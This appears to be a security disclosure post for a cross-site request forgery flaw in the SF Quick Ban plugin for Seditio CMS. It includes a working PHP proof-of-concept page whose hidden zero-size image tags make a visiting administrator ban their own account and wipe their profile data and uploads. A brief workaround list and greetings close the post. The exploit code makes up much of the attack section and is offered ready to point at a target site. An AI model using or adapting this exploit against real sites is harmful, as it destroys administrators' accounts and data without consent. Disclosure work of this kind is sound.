About Software:
SF - Quick Ban plugin is usefull and popular plugin for Seditio CMS.
It has usefull functionality for admins/moderators for ban users.(Sounds a bit rudy:D)
Author notes:
Well, I got Tired of having to manually Ban IP's and Accounts. So I mad this tool to do this with one click
What it does
Searches the User DB for any Account with the IP address your banning. Each of these accounts is banned.
Also, it clears out all icq/msn/avatar/photo/signature/location/etc fields (including all extra) fields that a user could edit.
This will also Delete all PFS, and any uploaded Avatar/Photo/Signature.
And Add and entry into the Banlist for that IP.
Accounts banned like this Will have a log generated for every account, and there will be an output telling you each account that was banned with this.
Proof of concept exploit:
(All in one CSRF exploit)
When admin with UID=1 visits this specially crafted malicious(exploit) page he/she will be
banned automatically (of course if there currently sfquick/quickban ban plugin(s) installed)
============== EXPLOIT========================
<?php
error_reporting('off');
/*
Ban Admin CSRF exploit
4 Fun
tested under seditio 165.x from seditio-eklenti.com/ seditio-build170.20120302 from neocrome.net
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
±----------+
| version() |
±----------+
| 5.5.21 |
±----------+
*/
$site='http://192.168.0.15/learn/128/sed/seditio.170/';// define your target site here.
$funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here
die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />'. PHP_EOL .
'<img src="' . $site . '/plug.php?e=sfquickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />' .
'<h1>' . strrev($funmsg) . '</h1>');
?>
===============EOF===========================
============= Workaround=======================
Do not use outdated plugins.
Try to Keep all your software Up2Date
Uninstall SF - Quick Ban /Quickview plugin(s).
Do not use administrative accounts for daily usage
Download Seditio From Official Vendors only.
=====PLEASE==HELP TO KEEP SEDITIO SECURE==========
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team ++Salamlar Bro-lar:))
++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^